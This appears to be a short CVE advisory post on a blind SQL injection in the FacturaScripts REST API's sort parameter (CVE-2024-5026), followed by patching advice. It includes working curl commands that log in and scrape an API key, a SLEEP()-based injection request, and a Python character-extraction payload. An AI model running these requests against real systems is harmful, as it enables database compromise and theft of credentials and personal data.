FacturaScripts, SQL Injection, CVE-2024-5026 (Critical)

Listen to this Post

The vulnerability exploits the `sort` parameter in the FacturaScripts REST API. In the legacy `ModelClass::getOrderBy()` method, user-supplied keys and values from the `$order` array are directly concatenated into the SQL `ORDER BY` clause. In the modern `DbQuery::orderBy()` method, a check for parentheses (strpos($field, '(')) is used to allow SQL functions, but this fails to validate the content, allowing an attacker to inject arbitrary SQL code within those parentheses. An authenticated API user can send a malicious `sort` parameter containing a subquery with a time-delay function like SLEEP(), enabling Blind SQL Injection for data exfiltration.
Platform: FacturaScripts
Version: All versions
Vulnerability: SQL Injection
Severity: Critical
Date: 2024-10-29

Prediction: Patch pending

What Undercode Say:

Retrieve CSRF token and login
TOKEN=$(curl -s -L -c cookies.txt "http://localhost:8091/login" | grep -Po 'name="multireqtoken" value="\K[^"]+' | head -n 1)
curl -s -b cookies.txt -c cookies.txt -X POST "http://localhost:8091/login" -d "fsNick=admin" -d "fsPassword=admin" -d "action=login" -d "multireqtoken=$TOKEN"
Extract API key using its ID
API_ID=$(curl -s -b cookies.txt "http://localhost:8091/EditSettings?activetab=ListApiKey" | grep -Po 'EditApiKey\?code=\K\d+' | head -n 1)
API_KEY=$(curl -s -b cookies.txt "http://localhost:8091/EditApiKey?code=$API_ID" | grep -Po 'name="apikey" value="\K[^"]+' | head -n 1)
Time-based SQLi verification
time curl -g -s -H "X-Auth-Token: $API_KEY" "http://localhost:8091/api/3/users?limit=1&sort[nick,(SELECT(SLEEP(3)))]=ASC"
Python exploitation snippet
payload = f"(SELECT IF(BINARY SUBSTRING(({query}),{i},1)='{char}',SLEEP(2),nick))"
elapsed = time_based_sqli(api_key, payload)

How Exploit:

1. Obtain valid API token.

2. Craft HTTP request with malicious `sort` parameter.

3. Use time-based blind SQLi for data extraction.

Protection from this CVE:

1. Implement strict column whitelist validation.

2. Use database escaping functions (`escapeColumn()`).

3. Apply query builder pattern.

Impact:

Complete database compromise.

Credential and PII theft.

Business data exfiltration.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top